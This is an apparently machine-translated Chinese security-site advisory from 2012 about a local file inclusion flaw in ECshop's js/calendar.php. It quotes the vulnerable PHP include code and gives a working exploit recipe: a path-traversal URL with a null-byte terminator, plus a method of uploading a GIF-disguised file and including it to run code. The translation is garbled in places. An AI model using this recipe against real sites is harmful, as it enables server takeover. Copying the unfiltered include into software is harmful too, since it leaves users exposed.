ECshop local include vulnerability-vulnerability warning-the black bar safety net

2012-07-13T00:00:00
ID MYHACK58:62201234314
Type myhack58
Reporter 佚名
Modified 2012-07-13T00:00:00

Description

js/calendar.php $lang = (! empty($_GET['lang'])) ? trim($_GET['lang']) : ‘EN’;//no filter, obviously contains a vulnerability if (! file_exists(‘../languages/’ . $lang . ‘/calendar.php’)) { $lang = ‘EN’; } require(dirname(dirname(FILE)) . ‘/data/config.php’); header(‘Content-type: application/x-javascript; charset=’ . EC_CHARSET); the include_once(‘../languages/’ . $lang . ‘/calendar.php’);//here contain, the need to truncate the test code : // need magic_quotes_gpc = Off /js/calendar. php? lang=../index. php%0 0. Note on the back.)

Use method: first register the user and then upload the GIF89a header of the GIF file to cheat, then contain the code:http://localhost/js/calendar. php? lang=../data/feedbackimg/6_20101228vyrpbg. gif%0 0.

Transferred from: Lynn’s blog